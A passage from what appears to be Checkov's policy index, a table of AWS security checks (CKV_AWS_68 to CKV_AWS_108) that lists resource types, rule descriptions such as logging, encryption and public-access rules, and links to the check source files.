Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) | -| 311 | CKV_AWS_68 | resource | AWS::CloudFront::Distribution | CloudFront Distribution should have WAF enabled | Cloudformation | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFEnabled.py) | -| 312 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) | -| 313 | CKV_AWS_69 | resource | AWS::AmazonMQ::Broker | Ensure Amazon MQ Broker should not have public access | Cloudformation | [AmazonMQBrokerPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py) | -| 314 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) | -| 315 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | -| 316 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | -| 317 | CKV_AWS_71 | resource | AWS::Redshift::Cluster | Ensure Redshift Cluster logging is enabled | Cloudformation | 
[RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterLogging.py) | -| 318 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) | -| 319 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) | -| 320 | CKV_AWS_73 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) | -| 321 | CKV_AWS_73 | resource | AWS::Serverless::Api | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) | -| 322 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) | -| 323 | CKV_AWS_74 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Cloudformation | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBEncryption.py) | -| 324 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) | -| 325 | CKV_AWS_75 | resource | 
aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) | -| 326 | CKV_AWS_76 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) | -| 327 | CKV_AWS_76 | resource | AWS::Serverless::Api | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) | -| 328 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | -| 329 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | -| 330 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) | -| 331 | CKV_AWS_78 | resource | AWS::CodeBuild::Project | Ensure that CodeBuild Project encryption is not disabled | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py) | -| 332 | CKV_AWS_78 | resource | aws_codebuild_project | 
Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) | -| 333 | CKV_AWS_79 | resource | AWS::EC2::LaunchTemplate | Ensure Instance Metadata Service Version 1 is not enabled | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py) | -| 334 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 335 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 336 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 337 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) | -| 338 | CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | -| 339 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | 
[AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) | -| 340 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | -| 341 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 342 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 343 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 344 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 345 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 346 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain 
Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 347 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 348 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) | -| 349 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | -| 350 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) | -| 351 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has Access Logging enabled | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | -| 352 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) | -| 353 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | 
[RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | -| 354 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | -| 355 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | -| 356 | CKV_AWS_88 | resource | [?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 357 | CKV_AWS_88 | resource | [?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 358 | CKV_AWS_88 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 359 | CKV_AWS_88 | resource | [].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 360 | CKV_AWS_88 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 361 | CKV_AWS_88 | resource | [].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. 
| Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 362 | CKV_AWS_88 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 363 | CKV_AWS_88 | resource | [].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 364 | CKV_AWS_88 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 365 | CKV_AWS_88 | resource | [].tasks[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 366 | CKV_AWS_88 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 367 | CKV_AWS_88 | resource | [].tasks[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 368 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. 
| Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 369 | CKV_AWS_88 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 370 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 371 | CKV_AWS_88 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | EC2 instance should not have public IP. | Ansible | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py) | -| 372 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 373 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. 
| Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 374 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | -| 375 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | -| 376 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) | -| 377 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | -| 378 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) | -| 379 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 380 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | 
[ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 381 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) | -| 382 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | -| 383 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 384 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. 
(Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 385 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) | -| 386 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | -| 387 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | -| 388 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | -| 389 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) | -| 390 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | -| 391 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit 
is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | -| 392 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | -| 393 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | -| 394 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) | -| 395 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | -| 396 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | -| 397 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | 
[EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | -| 398 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) | -| 399 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | -| 400 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | -| 401 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) | -| 402 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 403 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 404 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | 
[AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 405 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) | -| 406 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | -| 407 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) | -| 408 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | -| 409 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | -| 410 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 411 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 412 | CKV_AWS_107 | resource | 
AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 413 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 414 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 415 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | -| 416 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 417 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 418 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 419 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | 
